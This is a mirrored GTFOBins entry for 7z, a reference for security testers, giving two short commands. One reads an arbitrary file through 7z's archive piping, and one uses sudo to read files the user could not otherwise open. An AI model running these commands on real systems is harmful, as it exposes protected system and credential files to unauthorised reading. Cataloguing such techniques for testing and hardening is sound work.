1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/7z.md
Yuta Yamate 8d82a69fb7
Add 7z
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 12:26:45 +01:00

12 lines
237 B
Markdown

---
functions:
file-read:
- code: |
LFILE=file_to_read
7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
sudo:
- code: |
LFILE=file_to_read
sudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so
---